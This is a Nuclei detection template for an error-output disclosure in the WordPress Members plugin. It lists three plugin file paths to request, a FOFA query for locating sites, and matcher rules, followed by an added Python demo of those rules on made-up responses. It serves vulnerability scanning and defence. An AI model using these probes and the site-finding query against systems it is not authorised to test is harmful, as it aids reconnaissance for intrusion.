Vulnerability description
The WordPress Members plugin is vulnerable to error log disclosure via direct access to plugin files: requesting its PHP files directly returns PHP error output.
id: wp-members-error-log-disclosure

info:
  name: WordPress Members / Membership & User Role Editor Plugin - Error Log Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress Members plugin is vulnerable to error log disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/members/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: members
    framework: wordpress
    fofa-query: body="/wp-content/plugins/members/"
  tags: wp,wordpress,wp-plugin,fpd,members,exposure,error-log

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/members/admin/class-role-edit.php"
      - "{{BaseURL}}/wp-content/plugins/members/admin/class-role-new.php"
      - "{{BaseURL}}/wp-content/plugins/members/inc/class-role.php"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "wp-db")'
          - 'contains_any(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:","failed to open stream")'
        condition: and
# digest: 490a0046304402207e1f8e5318631ad1a197958deac371ac5272543eac8e8752127d57b45d917d1a02203eb9da022d93975485c331696449bd6544c4ebe107f567cddc46f7474137b3f7:922c64590222798bb761d5b6d8e72950
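As an added example that is not part of the template above, the Python below re-implements the template's three DSL matcher conditions and runs them over constructed HTTP responses, showing why each condition is needed to separate a genuine error-output leak from ordinary error pages. The sample bodies are hypothetical and were not captured from any real site.

```python
# Added example, not part of the Nuclei template: re-implements the
# template's DSL matcher (condition: and) in plain Python and runs it over
# constructed HTTP responses so the triage logic can be studied offline.
from dataclasses import dataclass

@dataclass
class Response:
    status_code: int
    body: str

def contains_any(body: str, *needles: str) -> bool:
    return any(n in body for n in needles)

def contains_all(body: str, *needles: str) -> bool:
    return all(n in body for n in needles)

def matches(resp: Response) -> bool:
    """All three DSL lines must hold, mirroring the template's 'condition: and'."""
    status_ok = resp.status_code in (200, 500)
    mentions_wpdb = "wp-db" in resp.body
    php_error = contains_any(resp.body, "Fatal error", "Uncaught Error") or contains_all(
        resp.body, "Warning:", "failed to open stream")
    return status_ok and mentions_wpdb and php_error

# Constructed sample responses (hypothetical; not captured from any real site).
SAMPLES = {
    # PHP fatal error that leaks the install path: should match
    "fatal_error": Response(500,
        "<b>Fatal error</b>: Uncaught Error: Call to undefined function add_action() "
        "in /var/www/html/wp-content/plugins/members/inc/class-role.php:25 "
        "Stack trace: #0 /var/www/html/wp-includes/wp-db.php(1)"),
    # include() warning with 'failed to open stream': should match
    "include_warning": Response(200,
        "Warning: include(wp-db.php): failed to open stream: No such file or directory"),
    # File that exits early and prints nothing: no error text, no match
    "blank_page": Response(200, ""),
    # Themed 404 page that happens to contain the strings: status rules it out
    "themed_404": Response(404, "Fatal error? wp-db page not found"),
    # Unrelated PHP error without the WordPress marker: no match
    "other_php_error": Response(500, "<b>Fatal error</b>: Allowed memory size exhausted"),
}

def evaluate_samples() -> dict:
    """Return {sample name: matched} for every constructed response."""
    return {name: matches(resp) for name, resp in SAMPLES.items()}

if __name__ == "__main__":
    for name, hit in evaluate_samples().items():
        print(f"{name:16} {'MATCH' if hit else 'no match'}")
```

The `wp-db` condition is what keeps generic PHP error pages from being reported, so a response that only shows a PHP error without any WordPress marker is correctly left unmatched.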